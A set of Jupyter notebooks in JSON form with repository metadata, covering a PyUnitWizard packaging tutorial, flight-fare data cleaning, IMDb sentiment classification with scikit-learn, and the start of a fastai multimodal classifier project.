The first ones in the file `main.py`:", "_____no_output_____" ], [ "```python\n### testlib/main.py ###\nfrom ._pyunitwizard import puw\n\ndef sum_quantities(a, b, form=None):\n\n aa = puw.string_to_quantity(a, to_form=form)\n bb = puw.string_to_quantity(b, to_form=form)\n output = aa+bb\n\n return output\n\ndef get_form(quantity):\n\n return puw.get_form(quantity)\n\ndef libraries_loaded():\n\n return puw.libraries_loaded()\n```", "_____no_output_____" ], [ "And in a directory named `box` let's include two methods to test your `_pyunitwizard` module:", "_____no_output_____" ], [ "```python\n### testlib/box/methods_a.py\nfrom .._pyunitwizard import puw\n\ndef get_default_form():\n\n return puw.get_default_form()\n```\n\n```python\n### testlib/box/methods_b.py\nfrom .._pyunitwizard import puw\n\ndef set_default_form(form):\n\n return puw.set_default_form(form)\n```\n", "_____no_output_____" ], [ "Finnally, let's writte the `__init__.py` files in the top directory and in `box`:", "_____no_output_____" ], [ "```python\n# testlib/box/__init__.py\nfrom .methods_a import get_default_form\nfrom .methods_b import set_default_form\n```\n\n```python\n# testlib/__init__.py\nfrom .main import sum_quantities, get_form, libraries_loaded\nfrom . import box\n```", "_____no_output_____" ], [ "This way we already have a simple library using PyUnitWizard. 
You can check how `testlib` works:", "_____no_output_____" ], [ "```ipython\nIn [1]: import testlib\n\nIn [2]: testlib.libraries_loaded()\nOut[2]: ['pint', 'openmm.unit']\n\nIn [3]: q = testlib.sum_quantities('2cm','3cm')\n\nIn [4]: testlib.get_form(q)\nOut[4]: 'openmm.unit'\n\nIn [5]: testlib.box.get_default_form()\nOut[5]: 'openmm.unit'\n\nIn [6]: testlib.box.set_default_form('pint')\n\nIn [7]: q = testlib.sum_quantities('2cm','3cm')\n\nIn [8]: testlib.get_form(q)\nOut[8]: 'pint'\n```", "_____no_output_____" ], [ "<div class=\"alert alert-block alert-info\">\n<b>Tip:</b> Together with testlib, in the github repository, you can find testlib2\nwhere pyunitwizard is included using only absolut import paths -as suggested by <a href=\"https://www.python.org/dev/peps/pep-0008/#imports\">PEP8</a>-</div>", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72f167fcca5d259303de6e3233bf05be56b433e
88,095
ipynb
Jupyter Notebook
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
Data_Clean_Train.ipynb
amanattar/Flight-Fare-Prediction
45bf23c4814cc380302387f5a6fb819267ed0946
[ "MIT" ]
null
null
null
32.688312
114
0.322527
[ [ [ "import numpy as np\nimport pandas as pd", "_____no_output_____" ], [ "df = pd.read_csv(\"Dataset/Data_Train.csv\")", "_____no_output_____" ], [ "df.shape", "_____no_output_____" ], [ "df.isnull().sum()", "_____no_output_____" ], [ "df = df.dropna()", "_____no_output_____" ], [ "df.isnull().sum()", "_____no_output_____" ], [ "df.head(10)", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10682 entries, 0 to 10682\nData columns (total 11 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 Airline 10682 non-null object\n 1 Date_of_Journey 10682 non-null object\n 2 Source 10682 non-null object\n 3 Destination 10682 non-null object\n 4 Route 10682 non-null object\n 5 Dep_Time 10682 non-null object\n 6 Arrival_Time 10682 non-null object\n 7 Duration 10682 non-null object\n 8 Total_Stops 10682 non-null object\n 9 Additional_Info 10682 non-null object\n 10 Price 10682 non-null int64 \ndtypes: int64(1), object(10)\nmemory usage: 1001.4+ KB\n" ], [ "df.nunique()", "_____no_output_____" ], [ "df[\"Journey_Month\"] = pd.to_datetime(df[\"Date_of_Journey\"],format = \"%d/%m/%Y\").dt.month\ndf[\"Journey_Day\"] = pd.to_datetime(df[\"Date_of_Journey\"],format=\"%d/%m/%Y\").dt.day", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df[\"Airline\"].unique()", "_____no_output_____" ], [ "df.drop(df.loc[df['Airline']==\"Trujet\"].index, inplace=True)", "_____no_output_____" ], [ "df[\"Airline\"].unique()", "_____no_output_____" ], [ "df.drop([\"Date_of_Journey\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df[\"Dep_hour\"] = pd.to_datetime(df[\"Dep_Time\"]).dt.hour\ndf[\"Dep_min\"] = pd.to_datetime(df[\"Dep_Time\"]).dt.minute\ndf.drop(['Dep_Time'],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df[\"Arrival_hour\"] = pd.to_datetime(df['Arrival_Time']).dt.hour\ndf[\"Arrival_min\"] = 
pd.to_datetime(df['Arrival_Time']).dt.minute\ndf.drop([\"Arrival_Time\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "duration = list(df[\"Duration\"])\n\nfor i in range(len(duration)):\n if len(duration[i].split()) != 2: # Check if duration contains only hour or mins\n if \"h\" in duration[i]:\n duration[i] = duration[i].strip() + \" 0m\" # Adds 0 minute\n else:\n duration[i] = \"0h \" + duration[i]\n # Adds 0 hour\n\nduration_hours = []\nduration_mins = []\nfor i in range(len(duration)):\n duration_hours.append(int(duration[i].split(sep = \"h\")[0])) # Extract hours from duration\n duration_mins.append(int(duration[i].split(sep = \"m\")[0].split()[-1]))", "_____no_output_____" ], [ "df[\"Duration_hour\"] = duration_hours\ndf[\"Duration_min\"] = duration_mins", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df.drop([\"Duration\"],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "df.drop(['Route','Additional_Info'],axis=1,inplace=True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "Airline = pd.get_dummies(df[[\"Airline\"]],drop_first=True)\nSource = pd.get_dummies(df[[\"Source\"]],drop_first=True)\nDestination = pd.get_dummies(df[[\"Destination\"]],drop_first=True)", "_____no_output_____" ], [ "Airline.head()", "_____no_output_____" ], [ "Source.head()", "_____no_output_____" ], [ "Destination.head()", "_____no_output_____" ], [ "df['Total_Stops'].unique()", "_____no_output_____" ], [ "df.replace({\"non-stop\": 0, \"1 stop\": 1, \"2 stops\": 2, \"3 stops\": 3, \"4 stops\": 4}, inplace = True)", "_____no_output_____" ], [ "df.head()", "_____no_output_____" ], [ "train_data = pd.concat([df,Airline,Source,Destination],axis=1)", "_____no_output_____" ], [ "train_data.head()", "_____no_output_____" ], [ "train_data.drop(['Airline',\"Source\",\"Destination\"],axis=1,inplace=True)", "_____no_output_____" ], [ "train_data.head()", 
"_____no_output_____" ], [ "train_data.shape", "_____no_output_____" ], [ "train_data.info()", "<class 'pandas.core.frame.DataFrame'>\nInt64Index: 10681 entries, 0 to 10682\nData columns (total 29 columns):\n # Column Non-Null Count Dtype\n--- ------ -------------- -----\n 0 Total_Stops 10681 non-null int64\n 1 Price 10681 non-null int64\n 2 Journey_Month 10681 non-null int64\n 3 Journey_Day 10681 non-null int64\n 4 Dep_hour 10681 non-null int64\n 5 Dep_min 10681 non-null int64\n 6 Arrival_hour 10681 non-null int64\n 7 Arrival_min 10681 non-null int64\n 8 Duration_hour 10681 non-null int64\n 9 Duration_min 10681 non-null int64\n 10 Airline_Air India 10681 non-null uint8\n 11 Airline_GoAir 10681 non-null uint8\n 12 Airline_IndiGo 10681 non-null uint8\n 13 Airline_Jet Airways 10681 non-null uint8\n 14 Airline_Jet Airways Business 10681 non-null uint8\n 15 Airline_Multiple carriers 10681 non-null uint8\n 16 Airline_Multiple carriers Premium economy 10681 non-null uint8\n 17 Airline_SpiceJet 10681 non-null uint8\n 18 Airline_Vistara 10681 non-null uint8\n 19 Airline_Vistara Premium economy 10681 non-null uint8\n 20 Source_Chennai 10681 non-null uint8\n 21 Source_Delhi 10681 non-null uint8\n 22 Source_Kolkata 10681 non-null uint8\n 23 Source_Mumbai 10681 non-null uint8\n 24 Destination_Cochin 10681 non-null uint8\n 25 Destination_Delhi 10681 non-null uint8\n 26 Destination_Hyderabad 10681 non-null uint8\n 27 Destination_Kolkata 10681 non-null uint8\n 28 Destination_New Delhi 10681 non-null uint8\ndtypes: int64(10), uint8(19)\nmemory usage: 1.1 MB\n" ], [ "train_data.to_csv(\"Dataset/train_clean_data.csv\",index = False)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72f20e5c156d47a0937e993741f67ed8f95accb
25,782
ipynb
Jupyter Notebook
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
.ipynb_checkpoints/sentiment_analysis-checkpoint.ipynb
prakharchoudhary/SentimentalAnalysis
429d2ae9a72f1ced13ef47d0db9bb18186f552e1
[ "MIT" ]
null
null
null
27.42766
664
0.491583
[ [ [ "<h1>\nSentiment analysis\n</h1>\n<ul>\n<li>Dataset used: IMDb movies dataset(http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz)</li>", "_____no_output_____" ] ], [ [ "import pyprind\nimport pandas as pd\nimport os\nimport io", "_____no_output_____" ], [ "\"\"\"\nOrganise the given dataset into operatable datastructure\nWe shall use Pandas DataFrames\n\"\"\"\npbar = pyprind.ProgBar(50000)\nlabels = {'pos':1, 'neg':0}\n\ndf = pd.DataFrame()\n\nfor s in ('test', 'train'):\n for l in ('pos', 'neg'):\n path = './aclImdb/%s/%s' % (s, l)\n for file in os.listdir(path):\n with io.open(os.path.join(path, file), 'r', encoding='utf-8') as infile:\n txt = infile.read()\n df = df.append([[txt, labels[l]]], ignore_index=True)\n pbar.update()\ndf.columns = ['review', 'sentiment']", "0% [##############################] 100% | ETA: 00:00:00\nTotal time elapsed: 00:09:08\n" ], [ "'''\nsave the organised data in a csv file\n'''\nimport numpy as np\nnp.random.seed(0)\ndf = df.reindex(np.random.permutation(df.index))\ndf.to_csv('./movie_data.csv', index=False, encoding='utf-8')", "_____no_output_____" ], [ "'''\nload data from the csv file\n'''\ndf = pd.read_csv('./movie_data.csv')\ndf.head(3)", "_____no_output_____" ], [ "\"\"\"\npreprocessing data\n\"\"\"\n\nimport re\ndef preprocessor(text):\n text = re.sub('<[^>]*>', '', text) #removes the HTML markup\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text) #finds emoticons\n text = re.sub('[\\W]+', ' ', text.lower()) + ''.join(emoticons).replace('-', '') \n return text\n\ndf['review'] = df['review'].apply(preprocessor)", "_____no_output_____" ], [ "preprocessor(df.loc[0, 'review'][-50:]) # example", "_____no_output_____" ], [ "preprocessor(\"</a>This :) is :( a test :-)!\") # example", "_____no_output_____" ], [ "#Processing documents into tokens\nfrom nltk.stem.porter import PorterStemmer\n\nporter = PorterStemmer()\n\ndef tokenizer(text):\n return text.split()\n\n\ndef tokenizer_porter(text):\n return 
[porter.stem(word) for word in text.split()]\n\n# exemplary run\ntokenizer_porter('runners like running and thus they run')", "_____no_output_____" ], [ "import nltk\nnltk.download('stopwords')\n\"\"\"\nstopwords are those words that are very common in a language\nand are thus likely to bear little to no value\nThere are 127 such stopwords in nltk library for\nenglish language.\"\"\"", "[nltk_data] Downloading package stopwords to /home/pc/nltk_data...\n[nltk_data] Package stopwords is already up-to-date!\n" ], [ "# example: how to use\nfrom nltk.corpus import stopwords\nstop = stopwords.words('english')\n[w for w in tokenizer_porter('a runner likes running and runs alot')[-10:] if w not in stop]", "_____no_output_____" ] ], [ [ "<h2>Training a logistic regression model for document classification</h2>", "_____no_output_____" ] ], [ [ "# Added version check for recent scikit-learn 0.18 checks\nfrom distutils.version import LooseVersion as Version\nfrom sklearn import __version__ as sklearn_version", "_____no_output_____" ], [ "#we will use simple bag-of-words model\nX_train = df.loc[:25000, 'review'].values\ny_train = df.loc[:25000, 'sentiment'].values\nX_test = df.loc[25000:, 'review'].values\ny_test = df.loc[25000:, 'sentiment'].values\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nif Version(sklearn_version) < '0.18':\n from sklearn.grid_search import GridSearchCV\nelse:\n from sklearn.model_selection import GridSearchCV\n\ntfidf = TfidfVectorizer(strip_accents=None,\n lowercase=False,\n preprocessor=None)\n\nparam_grid = [{'vect__ngram_range': [(1, 1)],\n 'vect__stop_words': [stop, None],\n 'vect__tokenizer': [tokenizer, tokenizer_porter],\n 'clf__penalty': ['l1', 'l2'],\n 'clf__C': [1.0, 10.0, 100.0]},\n {'vect__ngram_range': [(1, 1)],\n 'vect__stop_words': [stop, None],\n 'vect__tokenizer': [tokenizer, tokenizer_porter],\n 'vect__use_idf':[False],\n 
'vect__norm':[None],\n 'clf__penalty': ['l1', 'l2'],\n 'clf__C': [1.0, 10.0, 100.0]},\n ]\n\nlr_tfidf = Pipeline([('vect', tfidf),\n ('clf', LogisticRegression(random_state=0))])\n\ngs_lr_tfidf = GridSearchCV(lr_tfidf, param_grid,\n scoring='accuracy',\n cv=5,\n verbose=1,\n n_jobs=-1)", "_____no_output_____" ], [ "gs_lr_tfidf.fit(X_train, y_train)", "Fitting 5 folds for each of 48 candidates, totalling 240 fits\n" ], [ "print('Best parameter set: %s '% gs_lr_tfidf.best_params_)\nprint('CV Accuracy: %.3f'%gs_lr_tfidf.best_score_)", "Best parameter set: {'vect__ngram_range': (1, 1), 'vect__tokenizer': <function tokenizer at 0x7f709890d7d0>, 'clf__penalty': 'l2', 'clf__C': 10.0, 'vect__stop_words': None} \nCV Accuracy: 0.892\n" ], [ "clf = gs_lr_tfidf.best_estimator_\nprint('Test Accuracy: %.3f' % clf.score(X_test, y_test))", "Test Accuracy: 0.901\n" ] ], [ [ "<h4>Start Comment:</h4>", "_____no_output_____" ] ], [ [ "\"\"\"\nPlease note that gs_lr_tfidf.best_score_ is the average k-fold cross-validation score. 
\nI.e., if we have a GridSearchCV object with 5-fold cross-validation (like the one above), \nthe best_score_ attribute returns the average score over the 5-folds of the best model.\n\"\"\"\n\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nif Version(sklearn_version) < '0.18':\n from sklearn.cross_validation import StratifiedKFold\n from sklearn.cross_validation import cross_val_score\nelse:\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import cross_val_score\n\nnp.random.seed(0)\nnp.set_printoptions(precision=6)\ny = [np.random.randint(3) for i in range(25)]\nX = (y + np.random.randn(25)).reshape(-1, 1)\n\nif Version(sklearn_version) < '0.18':\n cv5_idx = list(StratifiedKFold(y, n_folds=5, shuffle=False, random_state=0))\n\nelse:\n cv5_idx = list(StratifiedKFold(n_splits=5, shuffle=False, random_state=0).split(X, y))\n \ncross_val_score(LogisticRegression(random_state=123), X, y, cv=cv5_idx)", "_____no_output_____" ], [ "if Version(sklearn_version) < '0.18':\n from sklearn.grid_search import GridSearchCV\nelse:\n from sklearn.model_selection import GridSearchCV\n\ngs = GridSearchCV(LogisticRegression(), {}, cv=cv5_idx, verbose=3).fit(X, y)", "Fitting 5 folds for each of 1 candidates, totalling 5 fits\n[CV] ................................................................\n[CV] ....................................... , score=0.600000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.400000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.600000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... , score=0.200000 - 0.0s\n[CV] ................................................................\n[CV] ....................................... 
, score=0.600000 - 0.0s\n" ], [ "gs.best_score_", "_____no_output_____" ], [ "cross_val_score(LogisticRegression(), X, y, cv=cv5_idx).mean()", "_____no_output_____" ] ], [ [ "<h4>End Comment</h4>", "_____no_output_____" ], [ "\n\n\n<h1>Working with bigger data - online algorithms and out-of-core learning</h1>", "_____no_output_____" ] ], [ [ "import numpy as np\nimport re\nfrom nltk.corpus import stopwords\n\ndef tokenizer(text):\n text = re.sub('<[^>]*>', '', text)\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text.lower())\n text = re.sub('[\\W]+', ' ', text.lower()) + ' '.join(emoticons).replace('-', '')\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\ndef stream_docs(path):\n with io.open(path, 'r', encoding='utf-8') as csv:\n next(csv) # skip header\n for line in csv:\n text, label = line[:-3], int(line[-2])\n yield text, label", "_____no_output_____" ], [ "next(stream_docs(path='./movie_data.csv'))", "_____no_output_____" ], [ "def get_minibatch(doc_stream, size):\n docs, y = [], []\n try:\n for _ in range(size):\n text, label = next(doc_stream)\n docs.append(text)\n y.append(label)\n except StopIteration:\n return None, None\n return docs, y", "_____no_output_____" ], [ "from sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.linear_model import SGDClassifier\nvect = HashingVectorizer(decode_error='ignore',\n n_features = 2**21,\n preprocessor = None,\n tokenizer=tokenizer\n )\nclf = SGDClassifier(loss='log', random_state=1, n_iter=1)\ndoc_stream = stream_docs(path='./movie_data.csv')", "_____no_output_____" ], [ "pbar = pyprind.ProgBar(45)\nclasses = np.array([0,1])\nfor _ in range(45):\n X_train, y_train = get_minibatch(doc_stream, size=1000)\n if not X_train:\n break\n X_train = vect.transform(X_train)\n clf.partial_fit(X_train, y_train, classes=classes)\n pbar.update()", "0% [##############################] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:36\n" ], [ "X_test, y_test = 
get_minibatch(doc_stream, size=5000)\nX_test = vect.transform(X_test)\nprint('Accuracy: %.3f' % clf.score(X_test, y_test))", "Accuracy: 0.883\n" ], [ "clf = clf.partial_fit(X_test, y_test)", "_____no_output_____" ] ], [ [ "<h3>Serializing fitted scikit-learn estimators</h3>", "_____no_output_____" ] ], [ [ "'''\nserialize the classifier as a pickle file\n'''\n\nimport pickle\nimport os\n\ndest = os.path.join('movieclassifier', 'pkl_objects')\nif not os.path.exists(dest):\n os.makedirs(dest)\n \n# we serialize our stopwords so that we do not have to install NLTK on our servers \npickle.dump(stop,\n open(os.path.join(dest, 'stopwords.pkl'), 'wb')\n )\n\npickle.dump(clf,\n open(os.path.join(dest, 'classifier.pkl'), 'wb')\n )", "_____no_output_____" ], [ "%%writefile movieclassifier/vectorizer.py\n\"\"\"\nSince 'HashingVectorizer' does not need to be fitted, we dont have to pickle it.\nRather this script will be used to import the vectorizer in the main file.\n\"\"\"\nimport re\nimport os\nimport pickle\n\nfrom sklearn.feature_extraction.text import HashingVectorizer\n\nprint os.getcwd()\ncur_dir = os.path.dirname(__file__)\nstop = pickle.load(open(\n os.path.join(cur_dir, \n 'pkl_objects', \n 'stopwords.pkl'), 'rb'))\n\ndef tokenizer(text):\n text = re.sub('<[^>]*>', '', text)\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)',\n text.lower())\n text = re.sub('[\\W]+', ' ', text.lower()) \\\n + ' '.join(emoticons).replace('-', '')\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\nvect = HashingVectorizer(decode_error='ignore',\n n_features=2**21,\n preprocessor=None,\n tokenizer=tokenizer)", "Overwriting movieclassifier/vectorizer.py\n" ], [ "os.chdir('movieclassifier')", "_____no_output_____" ], [ "import os\n\nimport pickle\nimport re\nfrom vectorizer import vect\n\nclf = pickle.load(open(os.path.join('pkl_objects', 'classifier.pkl'), 'rb'))", "_____no_output_____" ], [ "import numpy as np\nlabel = {0:'negative', 
1:'positive'}\n\nexample = ['I love this movie']\nX = vect.transform(example)\nprint('Prediction: {}\\nProbability: {:.2f}'.format(label[clf.predict(X)[0]], clf.predict_proba(X).max()*100))", "Prediction: positive\nProbability: 85.93\n" ] ], [ [ "<h3>Finished</h3>", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ] ]
e72f2d7f6402f16dc1188af3f52fe27ab2871998
830,162
ipynb
Jupyter Notebook
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
nbs/fastai_multimodal.ipynb
wjlgatech/fastai_multimodal
e307e81b12010d5f1afdc10c2c7efc524c85219d
[ "Apache-2.0" ]
null
null
null
68.489564
216,833
0.511226
[ [ [ "# default_exp core", "_____no_output_____" ] ], [ [ "# 01_core Objectives\nTo create end-to-end multimodal classifers based on Fastai-tabular, Fastai-text and Fastai-vision.\n\nSpecifically, I will construct 3 types of multimodal model:\n\n- `early concat`: concatinate cnt, cat, txt, img after data loading and data preprocessing, followed by a learner of choice (e.g. fastai tabular).\n- `middle concat`: concatinate the embeddings from each of the trained tab (cnt+cat), txt, img models, followed by a learner of choice.\n- `late concat`: concatinate the probability predictions from each of the trained tab(cnt+cat), txt, img models, followed by a learner of choice.\n\nUsing a few benchmark datasets, I will compare the 3 types of multimodal models on their\n\n- computation efficiency\n- ML performance\n- interpretability\n\n\n**Note**: this notebook is inheriated from [03_tech_nontech_classification.ipynb](https://colab.research.google.com/drive/1H23iYu2UNNMC4XMqQF72IJcQS6yrrHcB?usp=sharing)\n", "_____no_output_____" ], [ "## dev plan\n\n**Features to Build**\n- [/5] For iu data: use the majority vote of k nearest neightbors as recommendation/prediction. 
Here neighbors can be selected from both the iu population (knn of iu_embs) and same person's past meeting (knn of i_embs).\n\nReference: [calpal-recommenders-part1-fastai.ipynb](https://colab.research.google.com/drive/19HlugtvFmzarBi0WRYmc4_xW4_9QD3lH?usp=sharing)\n- [/5] Error Analysis for end2end model, confusion matrix, classification report, df_FP, df_FN\n- [/5] `early concat` method: create hybrid dataloader\n- [/5] XAI feature importance for both population and individual; what-if analysis\n- [/5] Feature selection\n- [/5] hyperparameter-tuning \n- [/5] learning from big data by dask https://gdmarmerola.github.io/big-data-ml-training/\n\n**Features Built**\n- [5/5] modeling txt_cols: train_fastai_text_classifier(), get_fastai_docs_embs()\n\n- [5/5] modeling img_cols: train_fastai_image_classifier(), get_fastai_imgs_embs()\n\n- [5/5] modeling tab_cols=cnt_cols+cat_cols: train_fastai_tabular_classifier(), get_fastai_tab_embs()\n- [5/5] ensembled modeling embs_ls, probs_ls: train_ensembled_classifier()\n\n- [5/5] end to end modeling txt_cols, img_cols, tab_cols: Fastai_Multimodal_Classifier()\n\n- [5/5] construct 4 benchmark datasets: \n - dataset0 (cnt, cat): income_level\n - dataset1 (txt, img) : entailment \n - dataset2 (cnt, cat, txt): pet adoption speed\n - dataset3 (cnt, cat, txt): salary\n\n- [5/5] experiment configuration: \n - i: select which dataset\n - nrows: select the size of df (for fast prototyping)", "_____no_output_____" ], [ "# install packages", "_____no_output_____" ] ], [ [ "!pip install nbdev\n\n# install most updated fastai & utils\n! 
[ -e /content ] && pip install -Uqq fastai \n#!pip install git+https://github.com/fastai/fastai # to deal with Error: found at least two devices, cuda:0 and cpu\n\"\"\"\n!pip install fastai wwf bayesian-optimization -q --upgrade\n!pip install autogluon\n\"\"\"\n\n# auto 'RESET RUNTIME'\ntry:\n import nbdev\nexcept ImportError:\n import os\n os.kill(os.getpid(), 9)", "Requirement already satisfied: nbdev in /usr/local/lib/python3.7/dist-packages (1.2.5)\nRequirement already satisfied: jupyter-client<8 in /usr/local/lib/python3.7/dist-packages (from nbdev) (7.2.2)\nRequirement already satisfied: Jinja2<3.1.0 in /usr/local/lib/python3.7/dist-packages (from nbdev) (2.11.3)\nRequirement already satisfied: fastcore>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from nbdev) (1.4.1)\nRequirement already satisfied: pip in /usr/local/lib/python3.7/dist-packages (from nbdev) (21.1.3)\nRequirement already satisfied: ipykernel in /usr/local/lib/python3.7/dist-packages (from nbdev) (4.10.1)\nRequirement already satisfied: fastrelease in /usr/local/lib/python3.7/dist-packages (from nbdev) (0.1.12)\nRequirement already satisfied: jupyter in /usr/local/lib/python3.7/dist-packages (from nbdev) (1.0.0)\nRequirement already satisfied: pyyaml in /usr/local/lib/python3.7/dist-packages (from nbdev) (3.13)\nRequirement already satisfied: ghapi in /usr/local/lib/python3.7/dist-packages (from nbdev) (0.1.20)\nRequirement already satisfied: nbconvert>=6.1 in /usr/local/lib/python3.7/dist-packages (from nbdev) (6.4.5)\nRequirement already satisfied: nbformat>=4.4.0 in /usr/local/lib/python3.7/dist-packages (from nbdev) (5.2.0)\nRequirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from nbdev) (21.3)\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.7/dist-packages (from Jinja2<3.1.0->nbdev) (2.0.1)\nRequirement already satisfied: tornado>=6.0 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (6.1)\nRequirement 
already satisfied: traitlets in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (5.1.1)\nRequirement already satisfied: python-dateutil>=2.8.2 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (2.8.2)\nRequirement already satisfied: nest-asyncio>=1.5.4 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (1.5.4)\nRequirement already satisfied: jupyter-core>=4.9.2 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (4.9.2)\nRequirement already satisfied: entrypoints in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (0.4)\nRequirement already satisfied: pyzmq>=22.3 in /usr/local/lib/python3.7/dist-packages (from jupyter-client<8->nbdev) (22.3.0)\nRequirement already satisfied: jupyterlab-pygments in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.1.2)\nRequirement already satisfied: beautifulsoup4 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (4.6.3)\nRequirement already satisfied: mistune<2,>=0.8.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.8.4)\nRequirement already satisfied: pandocfilters>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (1.5.0)\nRequirement already satisfied: nbclient<0.6.0,>=0.5.0 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.5.13)\nRequirement already satisfied: bleach in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (4.1.0)\nRequirement already satisfied: pygments>=2.4.1 in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (2.6.1)\nRequirement already satisfied: testpath in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.6.0)\nRequirement already satisfied: defusedxml in /usr/local/lib/python3.7/dist-packages (from nbconvert>=6.1->nbdev) (0.7.1)\nRequirement already satisfied: jsonschema!=2.5.0,>=2.4 in /usr/local/lib/python3.7/dist-packages 
(from nbformat>=4.4.0->nbdev) (4.3.3)\nRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (3.10.0.2)\nRequirement already satisfied: pyrsistent!=0.17.0,!=0.17.1,!=0.17.2,>=0.14.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (0.18.1)\nRequirement already satisfied: importlib-resources>=1.4.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (5.4.0)\nRequirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (4.11.3)\nRequirement already satisfied: attrs>=17.4.0 in /usr/local/lib/python3.7/dist-packages (from jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (21.4.0)\nRequirement already satisfied: zipp>=3.1.0 in /usr/local/lib/python3.7/dist-packages (from importlib-resources>=1.4.0->jsonschema!=2.5.0,>=2.4->nbformat>=4.4.0->nbdev) (3.7.0)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.8.2->jupyter-client<8->nbdev) (1.15.0)\nRequirement already satisfied: webencodings in /usr/local/lib/python3.7/dist-packages (from bleach->nbconvert>=6.1->nbdev) (0.5.1)\nRequirement already satisfied: ipython>=4.0.0 in /usr/local/lib/python3.7/dist-packages (from ipykernel->nbdev) (5.5.0)\nRequirement already satisfied: pickleshare in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (0.7.5)\nRequirement already satisfied: decorator in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (4.4.2)\nRequirement already satisfied: 